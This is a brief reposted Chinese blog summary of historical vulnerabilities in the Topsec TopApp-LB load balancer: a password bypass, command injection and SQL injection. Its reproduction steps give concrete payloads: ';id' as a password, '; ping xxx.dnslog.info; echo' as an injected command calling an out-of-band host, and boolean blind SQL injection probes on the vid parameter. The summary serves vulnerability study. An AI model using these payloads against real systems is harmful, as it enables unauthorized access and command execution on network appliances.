天融信TopApp-LB 負載均衡系統漏洞總結(歷史漏洞)

本文轉載自查看原文 2020-09-15 16:50 1525 漏洞復現-網絡設備、安全設備

一、漏洞描述

1、天融信負載均衡TopApp-LB系統無需密碼直接登陸

2、天融信TopApp-LB負載均衡命令執行漏洞

3、天融信TopApp-LB 負載均衡系統Sql注入漏洞

二、漏洞復現

1、使用poc:：用戶名隨意密碼：;id

2、使用poc：; ping xxx.dnslog.info; echo

3.1、抓包

3.2、vid參數加單引號，報錯

3.3、使用or 1=1 or 1=2發現返回界面不一樣，證明存在注入點(布爾盲注)

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Windows提權總結（一）——數據庫與系統漏洞 Hacker（17）----認識Windows系統漏洞 Nessus掃描操作系統漏洞天融信Top-app LB負載均衡SQL注入0day Hacker（19）----檢測Windows系統漏洞 linux系統漏洞掃描工具lynis CentOS系統漏洞的修復歷程 eYou(億郵)郵箱系統漏洞如何判斷主機是否存在某系統漏洞如何通過學校系統漏洞注冊到 @edu.cn 郵箱賬號？